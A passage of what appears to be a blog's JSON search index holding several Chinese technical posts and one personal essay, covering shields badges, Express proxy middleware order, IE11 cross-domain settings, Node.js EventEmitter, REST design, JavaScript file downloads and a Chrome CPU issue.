leftColor: \u0026#39;#e64a19\u0026#39;, rightColor: \u0026#39;#448aff\u0026#39;, style: \u0026#39;square\u0026#39; // just two style: square and plat(default) }) 渲染后的效果,查看在线demo: https://wdd.js.org/shields-less/example/\nshields服务开发 shields服务其实很简单。架构如下,客户端浏览器发送一个请求,向shields服务,shield服务解析请求,并向jenkins服务发送请求,jenkins服务每个项目都有json的http接口,可以获取项目信息的。shields将从jenkins获取的信息封装到svg小图标中,然后将svg小图标发送到客户端。\n最终效果 ","permalink":"https://wdd.js.org/posts/2018/10/how-to-make-shields-badge/","summary":"shields小徽章介绍 一般开源项目都会有一些小徽章来标识项目的状态信息,并且这些信息是会自动更新的。在shields的官网https://shields.io/#/, 上面有各种各样的小图标,并且有很多自定义的方案。\n起因:如何给私有部署的jenkins制作shields服务? 私有部署的jenkins是用来打包docker镜像的,而我想获取最新的项目打包的jenkins镜像信息。但是私有的jenkins项目信息,公网的shields服务是无法获取其信息的。那么如果搭建一个私有的shields服务呢?\n第一步:如何根据一些信息,制作svg图标 查看shields图标的源码,可以看到这些图标都是svg格式的图标。然后的思路就是,将文字信息转成svg图标。最后我发现这个思路是个死胡同,\n有个npm包叫做,text-to-svg, 似乎可以将文本转成svg, 但是看了文本转svg的效果,果断就放弃了。\n最后回到起点,看了shields官方仓库,发现一个templates目录,豁然开朗。原来svg图标是由svg的模板生成的,每次生成图标只需要将信息添加到模板中,然后就可以渲染出svg字符串了。\n顺着这个思路,发现一个包shields-lightweight\nvar shields = require(\u0026#39;shields-lightweight\u0026#39;); var svgBadge = shields.svg(\u0026#39;subject\u0026#39;, \u0026#39;status\u0026#39;, \u0026#39;red\u0026#39;, \u0026#39;flat\u0026#39;); 这个包的确可以生成和shields一样的小徽章,但是如果徽章中有中文,那么中文就会溢出。因为一个中文字符的宽度要比一个英文字符宽很多。\n所以我就fork了这个项目,重写了图标宽度计算的方式。shields-less\nnpm install shields-less var shieldsLess = require(\u0026#39;shields-less\u0026#39;) var svgBadge = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, style: \u0026#39;square\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, leftColor: \u0026#39;#e64a19\u0026#39;, rightColor: \u0026#39;#448aff\u0026#39;, style: \u0026#39;square\u0026#39; // just two style: square and plat(default) }) 渲染后的效果,查看在线demo: https://wdd.","title":"shields小徽章是如何生成的?以及搭建自己的shield服务器"},{"content":"前后端分离应用的架构 在前后端分离架构中,为了避免跨域以及暴露内部服务地址。一般来说,我会在Express这层中加入一个反向代理。\n所有向后端服务访问的请求,都通过代理转发到内部的各个服务。\n这个反向代理服务器,做起来很简单。用http-proxy-middleware这个模块,几行代码就可以搞定。\n// app.js Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) http-proxy-middleware实际上是对于node-http-proxy的更加简便的封装。node-http-proxy是http-proxy-middleware的底层包,如果node-http-proxy有问题,那么这个问题就会影响到http-proxy-middleware这个包。\n最近的bug http-proxy-middleware最近有个问题,请求体在被代理转发前,如果请求体被解析了。那么后端服务将会收不到请求结束的消息,从浏览器的网络面板可以看出,一个请求一直在pending状态。\nCannot proxy after parsing body #299, 实际上这个问题在node-http-proxy也被提出过,而且处于open状态。POST fails/hangs examples to restream also not working #1279\n目前这个bug还是处于open状态,但是还是有解决方案的。就是将请求体解析的中间件挂载在代理之后。\n下面的代码,express.json()会对json格式的请求体进行解析。方案1在代理前就进行body解析,所有格式是json的请求体都会被解析。\n但是有些走代理的请求,如果我们并不关心请求体的内容是什么,实际上我们可以不解析那些走代理的请求。所以,可以先挂载代理中间件,然后挂载请求体解析中间件,最后挂载内部的一些接口服务。\n// 方案1 bad app.use(express.json()) Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) // 方案2 good Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(express.json()) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) 总结 经过这个问题,我对Express中间件的挂载顺序有了更加深刻的认识。\n同时,在使用第三方包的过程中,如果该包bug,那么也需要自行找出合适的解决方案。而这个能力,往往就是高手与新手的区别。\n","permalink":"https://wdd.js.org/posts/2018/09/express-middleware-order-proxy-problem/","summary":"前后端分离应用的架构 在前后端分离架构中,为了避免跨域以及暴露内部服务地址。一般来说,我会在Express这层中加入一个反向代理。\n所有向后端服务访问的请求,都通过代理转发到内部的各个服务。\n这个反向代理服务器,做起来很简单。用http-proxy-middleware这个模块,几行代码就可以搞定。\n// app.js Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) http-proxy-middleware实际上是对于node-http-proxy的更加简便的封装。node-http-proxy是http-proxy-middleware的底层包,如果node-http-proxy有问题,那么这个问题就会影响到http-proxy-middleware这个包。\n最近的bug http-proxy-middleware最近有个问题,请求体在被代理转发前,如果请求体被解析了。那么后端服务将会收不到请求结束的消息,从浏览器的网络面板可以看出,一个请求一直在pending状态。\nCannot proxy after parsing body #299, 实际上这个问题在node-http-proxy也被提出过,而且处于open状态。POST fails/hangs examples to restream also not working #1279\n目前这个bug还是处于open状态,但是还是有解决方案的。就是将请求体解析的中间件挂载在代理之后。\n下面的代码,express.json()会对json格式的请求体进行解析。方案1在代理前就进行body解析,所有格式是json的请求体都会被解析。\n但是有些走代理的请求,如果我们并不关心请求体的内容是什么,实际上我们可以不解析那些走代理的请求。所以,可以先挂载代理中间件,然后挂载请求体解析中间件,最后挂载内部的一些接口服务。\n// 方案1 bad app.use(express.json()) Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) // 方案2 good Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(express.json()) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) 总结 经过这个问题,我对Express中间件的挂载顺序有了更加深刻的认识。\n同时,在使用第三方包的过程中,如果该包bug,那么也需要自行找出合适的解决方案。而这个能力,往往就是高手与新手的区别。","title":"Express代理中间件问题与解决方案"},{"content":"IE11有安全设置中有两个选项,\n跨域浏览窗口和框架 通过域访问数据源 如果上面两个选项被禁用,那么IE11会拒绝跨域请求。如果想要跨域成功,必须将上面两个选项设置为启用。\n第一步 打开IE11 点击浏览器右上角的齿轮图标 点击弹框上的 Internet选项 第二步 点击安全 点击Internet 点击自定义级别 第三步 找到跨域浏览窗口和框架\n如果这项是禁用的,那么要勾选启用。\n找到通过域访问数据源\n如果这项是禁用的,那么要勾选启用。\n最后在点击确定。\n最后,如果跨域浏览窗口和框架,通过域访问数据源都启用了,还是无法跨域。那么最好重启一下电脑。有些设置可能在重启后才会生效。\n","permalink":"https://wdd.js.org/posts/2018/08/ie-cross-domain-settings/","summary":"IE11有安全设置中有两个选项,\n跨域浏览窗口和框架 通过域访问数据源 如果上面两个选项被禁用,那么IE11会拒绝跨域请求。如果想要跨域成功,必须将上面两个选项设置为启用。\n第一步 打开IE11 点击浏览器右上角的齿轮图标 点击弹框上的 Internet选项 第二步 点击安全 点击Internet 点击自定义级别 第三步 找到跨域浏览窗口和框架\n如果这项是禁用的,那么要勾选启用。\n找到通过域访问数据源\n如果这项是禁用的,那么要勾选启用。\n最后在点击确定。\n最后,如果跨域浏览窗口和框架,通过域访问数据源都启用了,还是无法跨域。那么最好重启一下电脑。有些设置可能在重启后才会生效。","title":"IE11跨域检查跨域设置"},{"content":" 大三那年的暑假 大三那年暑假,很多同学都回去了,寝室大楼空空如也。\n留在上海的同学都在各自找着兼职的工作,为了不显得无聊,我也在网上随便发了一些简历,试试看运气。\n写简历最难写的部分就是写你自己的长处是什么?搜索枯肠,觉得自己似乎也没什特长。感觉大学三年学到一些东西,又感觉什么都没学到。\n如果没有特长,总该也有点理想吧,比如想干点什么? 似乎我也没什么想做的事情。\n小时候我们都有理想,慢慢长大后,理想越来越模糊,变得越来越迷茫。\n大学里,大部分的人都是在打游戏。我也曾迷恋过打游戏,但是因为自己比较菜,总是被虐,所以放弃了。\n但是我也不是那种天天对着笔记本看电视剧的人。\n回忆初三那年的暑假 记得,初三的暑假,我参加了一个学校看展的一个免费的计算机培训班。因为培训的老师说,培训结束前会有一个测试,成绩最好的会有几百块的奖励。\n为了几百块的奖励,我第一个背诵完五笔拆字法。随后老师教了我们PS, 就是photoshop。当时我的理解就是,ps可以做出很多搞笑的图片。\n为了成为一个有能力做出搞笑图片的人。我在高中和大学期间,断断续续的系统的自学了PS。\n下面给展示几张我的PS照片\n【毕业照】\n【帮别人做的艺术照】\n【刺客信条 换脸 我自己】\n【旅游照 换脸 我自己】\n【宿舍楼 上面ps了一条狼】\n古玩艺术电商中的店小二 基本上,我的PS技术还是能够找点兼职做的。没过多久,我收到了面试邀请,面试的公司位于一个古玩收藏品市场中。\n当然我面试成功了,开出的日薪也是非常诱人,每天35元。\n在上海,35元一天的工资,除去来回上下班做地铁和公交,还有中午饭的费用外,基本上不会剩下什么,有时候稍微午饭丰盛点,自己就要倒贴。但是这也是一次不错的尝试,至少有史以来,除去父母以外,我用能力问别人要钱了。\n35元的日薪持续很短一段时间,然后我就涨薪了,到达每天100元。在这个做兼职的地方,我最高拿到的日薪是200元。\n兼职期间我做了各式各样的工作:\n古玩艺术品摄影 海报制作 拍卖图册制作 linux运维 APP UI 设计 网页设计 python爬虫 兼职的日志过得很苦,单是还算充实。虽然工资不高,但是因为还没毕业,也没有奢望过高的工资。\n【上图 我在一个古玩店的拍摄玉器的时候,有个小女孩过来找我玩,我随手拍的】\n【上图 是在1号线 莲花路地铁站 因为错过了地铁拍的】\n【上图 是从1号线 莲花地铁站 转公交拍的】\n【每天早上起的很早,能够看到军训的学生在操场上奔跑】\n【在古玩店一般都要拍到很晚,因为是按张数算拍照工资,拍的越多,工资越高。还好晚上回公司 打车费用是可以报销的】\n【晚上还要回到学校,一般到学校就快晚上10点左右了】\n【毕业了,新校区依然很漂亮】\n【毕业了,老校区下了一场雨】\n【毕业了,青春像一艘船,沉入海底】\n【毕业了,我等的人,你在哪里?】\n","permalink":"https://wdd.js.org/posts/2018/08/the-rest-of-your-life/","summary":"大三那年的暑假 大三那年暑假,很多同学都回去了,寝室大楼空空如也。\n留在上海的同学都在各自找着兼职的工作,为了不显得无聊,我也在网上随便发了一些简历,试试看运气。\n写简历最难写的部分就是写你自己的长处是什么?搜索枯肠,觉得自己似乎也没什特长。感觉大学三年学到一些东西,又感觉什么都没学到。\n如果没有特长,总该也有点理想吧,比如想干点什么? 似乎我也没什么想做的事情。\n小时候我们都有理想,慢慢长大后,理想越来越模糊,变得越来越迷茫。\n大学里,大部分的人都是在打游戏。我也曾迷恋过打游戏,但是因为自己比较菜,总是被虐,所以放弃了。\n但是我也不是那种天天对着笔记本看电视剧的人。\n回忆初三那年的暑假 记得,初三的暑假,我参加了一个学校看展的一个免费的计算机培训班。因为培训的老师说,培训结束前会有一个测试,成绩最好的会有几百块的奖励。\n为了几百块的奖励,我第一个背诵完五笔拆字法。随后老师教了我们PS, 就是photoshop。当时我的理解就是,ps可以做出很多搞笑的图片。\n为了成为一个有能力做出搞笑图片的人。我在高中和大学期间,断断续续的系统的自学了PS。\n下面给展示几张我的PS照片\n【毕业照】\n【帮别人做的艺术照】\n【刺客信条 换脸 我自己】\n【旅游照 换脸 我自己】\n【宿舍楼 上面ps了一条狼】\n古玩艺术电商中的店小二 基本上,我的PS技术还是能够找点兼职做的。没过多久,我收到了面试邀请,面试的公司位于一个古玩收藏品市场中。\n当然我面试成功了,开出的日薪也是非常诱人,每天35元。\n在上海,35元一天的工资,除去来回上下班做地铁和公交,还有中午饭的费用外,基本上不会剩下什么,有时候稍微午饭丰盛点,自己就要倒贴。但是这也是一次不错的尝试,至少有史以来,除去父母以外,我用能力问别人要钱了。\n35元的日薪持续很短一段时间,然后我就涨薪了,到达每天100元。在这个做兼职的地方,我最高拿到的日薪是200元。\n兼职期间我做了各式各样的工作:\n古玩艺术品摄影 海报制作 拍卖图册制作 linux运维 APP UI 设计 网页设计 python爬虫 兼职的日志过得很苦,单是还算充实。虽然工资不高,但是因为还没毕业,也没有奢望过高的工资。\n【上图 我在一个古玩店的拍摄玉器的时候,有个小女孩过来找我玩,我随手拍的】\n【上图 是在1号线 莲花路地铁站 因为错过了地铁拍的】\n【上图 是从1号线 莲花地铁站 转公交拍的】\n【每天早上起的很早,能够看到军训的学生在操场上奔跑】\n【在古玩店一般都要拍到很晚,因为是按张数算拍照工资,拍的越多,工资越高。还好晚上回公司 打车费用是可以报销的】\n【晚上还要回到学校,一般到学校就快晚上10点左右了】\n【毕业了,新校区依然很漂亮】\n【毕业了,老校区下了一场雨】\n【毕业了,青春像一艘船,沉入海底】\n【毕业了,我等的人,你在哪里?】","title":"毕业后,青春像一艘船,沉入海底"},{"content":"1. 环境 node 8.11.3 2. 基本使用 // 01.js const EventEmitter = require(\u0026#39;events\u0026#39;); class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter(); myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;an event occurred!\u0026#39;); }); myEmitter.emit(\u0026#39;event\u0026#39;); 输出:\nan event occurred! 3. 传参与this指向 emit()方法可以传不限制数量的参数。 除了箭头函数外,在回调函数内部,this会被绑定到EventEmitter类的实例上 // 02.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;event\u0026#39;, function (a, b){ console.log(a, b, this, this === myEmitter) }) myEmitter.on(\u0026#39;event\u0026#39;, (a, b) =\u0026gt; { console.log(a, b, this, this === myEmitter) }) myEmitter.emit(\u0026#39;event\u0026#39;, \u0026#39;a\u0026#39;, {name:\u0026#39;wdd\u0026#39;}) 输出:\na { name: \u0026#39;wdd\u0026#39; } MyEmitter { domain: null, _events: { event: [ [Function], [Function] ] }, _eventsCount: 1, _maxListeners: undefined } true a { name: \u0026#39;wdd\u0026#39; } {} false 4. 同步还是异步调用listeners? emit()法会同步按照事件注册的顺序执行回调 // 03.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;01 an event occurred!\u0026#39;) }) myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;02 an event occurred!\u0026#39;) }) console.log(1) myEmitter.emit(\u0026#39;event\u0026#39;) console.log(2) 输出:\n1 01 an event occurred! 02 an event occurred! 2 深入思考,为什么事件回调要同步?异步了会有什么问题?\n同步去调用事件监听者,能够确保按照注册顺序去调用事件监听者,并且避免竞态条件和逻辑错误。\n5. 如何只订阅一次事件? 使用once去只订阅一次事件 // 04.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() let m = 0 myEmitter.once(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(++m) }) myEmitter.emit(\u0026#39;event\u0026#39;) myEmitter.emit(\u0026#39;event\u0026#39;) 6. 不订阅,就发飙的错误事件 error是一个特别的事件名,当这个事件被触发时,如果没有对应的事件监听者,则会导致程序崩溃。\nevents.js:183 throw er; // Unhandled \u0026#39;error\u0026#39; event ^ Error: test at Object.\u0026lt;anonymous\u0026gt; (/Users/xxx/github/node-note/events/05.js:12:25) at Module._compile (module.js:635:30) at Object.Module._extensions..js (module.js:646:10) at Module.load (module.js:554:32) at tryModuleLoad (module.js:497:12) at Function.Module._load (module.js:489:3) at Function.Module.runMain (module.js:676:10) at startup (bootstrap_node.js:187:16) at bootstrap_node.js:608:3 所以,最好总是给EventEmitter实例添加一个error的监听器\nconst EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;error\u0026#39;, (err) =\u0026gt; { console.log(err) }) console.log(1) myEmitter.emit(\u0026#39;error\u0026#39;, new Error(\u0026#39;test\u0026#39;)) console.log(2) 7. 内部事件 newListener与removeListener newListener与removeListener是EventEmitter实例的自带的事件,你最好不要使用同样的名字作为自定义的事件名。\nnewListener在订阅者被加入到订阅列表前触发 removeListener在订阅者被移除订阅列表后触发 // 06.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;newListener\u0026#39;, (event, listener) =\u0026gt; { console.log(\u0026#39;----\u0026#39;) console.log(event) console.log(listener) }) myEmitter.on(\u0026#39;myEmitter\u0026#39;, (err) =\u0026gt; { console.log(err) }) 输出:\n从输出可以看出,即使没有去触发myEmitter事件,on()方法也会触发newListener事件。\n---- myEmitter [Function] 8. 事件监听数量限制 myEmitter.listenerCount(\u0026rsquo;event\u0026rsquo;): 用来计算一个实例上某个事件的监听者数量 EventEmitter.defaultMaxListeners: EventEmitter类默认的最大监听者的数量,默认是10。超过会有警告输出。 myEmitter.getMaxListeners(): EventEmitter实例默认的某个事件最大监听者的数量,默认是10。超过会有警告输出。 myEmitter.eventNames(): 返回一个实例上又多少种事件 EventEmitter和EventEmitter实例的最大监听数量为10并不是一个硬性规定,只是一个推荐值,该值可以通过setMaxListeners()接口去改变。\n改变EventEmitter的最大监听数量会影响到所有EventEmitter实例 该变EventEmitter实例的最大监听数量只会影响到实例自身 如无必要,最好的不要去改变默认的监听数量限制。事件监听数量是node检测内存泄露的一个标准一个维度。\nEventEmitter实例的最大监听数量不是一个实例的所有监听数量。\n例如同一个实例A类型事件5个监听者,B类型事件6个监听者,这个并不会有告警。如果A类型有11个监听者,就会有告警提示。\n如果在事件中发现类似的告警提示Possible EventEmitter memory leak detected,要知道从事件最大监听数的角度去排查问题。\n// 07.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() const maxListeners = 11 for (let i = 0; i \u0026lt; maxListeners; i++) { myEmitter.on(\u0026#39;event\u0026#39;, (err) =\u0026gt; { console.log(err, 1) }) } myEmitter.on(\u0026#39;event1\u0026#39;, (err) =\u0026gt; { console.log(err, 11) }) console.log(myEmitter.listenerCount(\u0026#39;event\u0026#39;)) console.log(EventEmitter.defaultMaxListeners) console.log(myEmitter.getMaxListeners()) console.log(myEmitter.eventNames()) 输出:\n11 10 10 [ \u0026#39;event\u0026#39;, \u0026#39;event1\u0026#39; ] (node:23957) MaxListenersExceededWarning: Possible EventEmitter memory leak detected. 11 event listeners added. Use emitter.setMaxListeners() to increase limit ","permalink":"https://wdd.js.org/posts/2018/08/deepin-nodejs-events/","summary":"1. 环境 node 8.11.3 2. 基本使用 // 01.js const EventEmitter = require(\u0026#39;events\u0026#39;); class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter(); myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;an event occurred!\u0026#39;); }); myEmitter.emit(\u0026#39;event\u0026#39;); 输出:\nan event occurred! 3. 传参与this指向 emit()方法可以传不限制数量的参数。 除了箭头函数外,在回调函数内部,this会被绑定到EventEmitter类的实例上 // 02.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;event\u0026#39;, function (a, b){ console.log(a, b, this, this === myEmitter) }) myEmitter.on(\u0026#39;event\u0026#39;, (a, b) =\u0026gt; { console.","title":"NodeJS Events 模块笔记"},{"content":"需求描述 可以把字符串下载成txt文件 可以把对象序列化后下载json文件 下载由ajax请求返回的Excel, Word, pdf 等等其他文件 基本思想 downloadJsonIVR () { var data = {name: \u0026#39;age\u0026#39;} data = JSON.stringify(data) data = new Blob([data]) var a = document.createElement(\u0026#39;a\u0026#39;) var url = window.URL.createObjectURL(data) a.href = url a.download = \u0026#39;what-you-want.json\u0026#39; a.click() }, 从字符串下载文件 从ajax请求中下载文件 ","permalink":"https://wdd.js.org/posts/2018/06/js-download-file/","summary":"需求描述 可以把字符串下载成txt文件 可以把对象序列化后下载json文件 下载由ajax请求返回的Excel, Word, pdf 等等其他文件 基本思想 downloadJsonIVR () { var data = {name: \u0026#39;age\u0026#39;} data = JSON.stringify(data) data = new Blob([data]) var a = document.createElement(\u0026#39;a\u0026#39;) var url = window.URL.createObjectURL(data) a.href = url a.download = \u0026#39;what-you-want.json\u0026#39; a.click() }, 从字符串下载文件 从ajax请求中下载文件 ","title":"JavaScript动态下载文件"},{"content":" 1. 什么是REST? 2. REST API最为重要的约束 3. REST API HTTP方法 与 CURD 4. 状态码 5. RESTful架构设计 6. 文档 7. 版本 8. 深入理解状态与无状态 9. 参考 1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipdeia\nREST API 不是一个标准或者一个是协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向客户端请求此API,则您的客户端为RESTful。\n2. REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CURD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。 这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。\n4. 状态码 1xx - informational; 2xx - success; 3xx - redirection; 4xx - client error; 5xx - server error. 5. RESTful架构设计 GET /users - get all users; GET /users/123 - get a particular user with id = 123; GET /posts - get all posts. POST /users. PUT /users/123 - upgrade a user entity with id = 123. DELETE /users/123 - delete a user with id = 123. 6. 文档 7. 版本 版本管理一般有两种\n位于url中的版本标识: http://example.com/api/v1 位于请求头中的版本标识:Accept: application/vnd.redkavasyl+json; version=2.0 8. 深入理解状态与无状态 我认为REST架构最难理解的就是状态与无状态。下面我画出两个示意图。\n图1是有状态的服务,状态存储于单个服务之中,一旦一个服务挂了,状态就没了,有状态服务很难扩展。无状态的服务,状态存储于客户端,一个请求可以被投递到任何服务端,即使一个服务挂了,也不回影响到同一个客户端发来的下一个请求。\n【图1 有状态的架构】\n【图2 无状态的架构】\neach request from client to server must contain all of the information necessary to understand the request, and cannot take advantage of any stored context on the server. Session state is therefore kept entirely on the client. rest_arch_style stateless\n每一个请求自身必须携带所有的信息,让客户端理解这个请求。举个栗子,常见的翻页操作,应该客户端告诉服务端想要看第几页的数据,而不应该让服务端记住客户端看到了第几页。\n9. 参考 A Beginner’s Tutorial for Understanding RESTful API Versioning REST Services ","permalink":"https://wdd.js.org/posts/2018/06/think-about-restful-api/","summary":"1. 什么是REST? 2. REST API最为重要的约束 3. REST API HTTP方法 与 CURD 4. 状态码 5. RESTful架构设计 6. 文档 7. 版本 8. 深入理解状态与无状态 9. 参考 1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipdeia\nREST API 不是一个标准或者一个是协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向客户端请求此API,则您的客户端为RESTful。\n2. REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CURD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。 这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。","title":"Restful API 架构思考"},{"content":"1. 问题现象 有时候发现mac风扇响的厉害,于是我检查了mac系统的活动监视器,发现Google Chrome Helper占用99%的CPU。\n通常来说Chrome如果占用过高的内存,这并不是什么问题,毕竟Chrome的性能以及易用性是建立在占用很多内存的基础上的。但是无论什么程序,持续的占用超过80%的cpu,都是极不正常的。大多数程序都是占用维持在低于10%的CPU。\n活动监视器指出问题出现在Chrome浏览器。那么问题可以再次细分为三块。\nChrome系统自身问题 一些插件,例如flash插件,扩展插件 网页程序js出现的问题 2. 从任务管理器着手 其实Chrome浏览器自身也是有任务管理器的,一般来说windows版chrome按住shift+esc就会调出任务管理器窗口。mac版调出任务管理器没有快捷,只能通过Window \u0026gt; Task Manager调出。\n调出任务管理器后,发现一个标签页,CPU占用率达到99%, 那就说明,应该是这个标签页中存在持续占用大量CPU计算的程序。\n最后找到这个页面,发现该页面背景图是一种动态粒子图。就是基于particles.js做的。我想,终于找到你了。\n于是我把这个动态图的相关js代码给注释掉,电脑的风扇也终于变得安静了。\n3. 问题总结 问题解决的总结:解决问题的方法时很简单的,基于一个现象,找到一个原因,基于这个原因再找到一个现象,然后一步一步缩小问题范围,逼近最终原因。\n机器CPU过高,一般都是可以从任务管理器着手解决。系统的任务管理器可以监控各个程序占用的CPU是否正常,通常程序自身也是有任务管理的。\n像谷歌浏览器这种软件,几乎本身就是一个操作系统,所以说它的任务管理器也是必不可少的。Chrome浏览器再带的任务管理器可以告诉你几个关键信息。\n任务占用的内存 任务占用的CPU 任务占用的网络流量大小 如果你一打开谷歌浏览器,你的电脑风扇就拼命转,那你最好打开谷歌浏览器的任务管理器看看。\n4. 关于动态背景图的思考 动态背景图往往都会给人很酷炫的感觉,但是这种背景图的制作并不是很复杂,如果你使用particles.js来制作,制作一些动态背景图只需要几行代码就可以搞定。但是这种酷炫的背后,CPU也在承受着压力。\nparticles.js提供的demo效果图,在Chrome中CPU会被提高到100%。\n也有几家使用动态背景图的官网。我记得知乎以前就用过动态背景图,但是现在找不到了。另外一个使用动态背景图的是daocloud, CPU也是会在首页飙升到50%。\n所谓:强招必自损,动态背景图在给人以炫酷科技感的同时,也需要权衡这种技术对客户计算机的压力。\n另外,不要小看JavaScript, 它也可能引起大问题\n","permalink":"https://wdd.js.org/posts/2018/06/how-to-fix-google-chrome-very-high-cpu-cost/","summary":"1. 问题现象 有时候发现mac风扇响的厉害,于是我检查了mac系统的活动监视器,发现Google Chrome Helper占用99%的CPU。\n通常来说Chrome如果占用过高的内存,这并不是什么问题,毕竟Chrome的性能以及易用性是建立在占用很多内存的基础上的。但是无论什么程序,持续的占用超过80%的cpu,都是极不正常的。大多数程序都是占用维持在低于10%的CPU。\n活动监视器指出问题出现在Chrome浏览器。那么问题可以再次细分为三块。\nChrome系统自身问题 一些插件,例如flash插件,扩展插件 网页程序js出现的问题 2. 从任务管理器着手 其实Chrome浏览器自身也是有任务管理器的,一般来说windows版chrome按住shift+esc就会调出任务管理器窗口。mac版调出任务管理器没有快捷,只能通过Window \u0026gt; Task Manager调出。\n调出任务管理器后,发现一个标签页,CPU占用率达到99%, 那就说明,应该是这个标签页中存在持续占用大量CPU计算的程序。\n最后找到这个页面,发现该页面背景图是一种动态粒子图。就是基于particles.js做的。我想,终于找到你了。\n于是我把这个动态图的相关js代码给注释掉,电脑的风扇也终于变得安静了。\n3. 问题总结 问题解决的总结:解决问题的方法时很简单的,基于一个现象,找到一个原因,基于这个原因再找到一个现象,然后一步一步缩小问题范围,逼近最终原因。\n机器CPU过高,一般都是可以从任务管理器着手解决。系统的任务管理器可以监控各个程序占用的CPU是否正常,通常程序自身也是有任务管理的。\n像谷歌浏览器这种软件,几乎本身就是一个操作系统,所以说它的任务管理器也是必不可少的。Chrome浏览器再带的任务管理器可以告诉你几个关键信息。\n任务占用的内存 任务占用的CPU 任务占用的网络流量大小 如果你一打开谷歌浏览器,你的电脑风扇就拼命转,那你最好打开谷歌浏览器的任务管理器看看。\n4. 关于动态背景图的思考 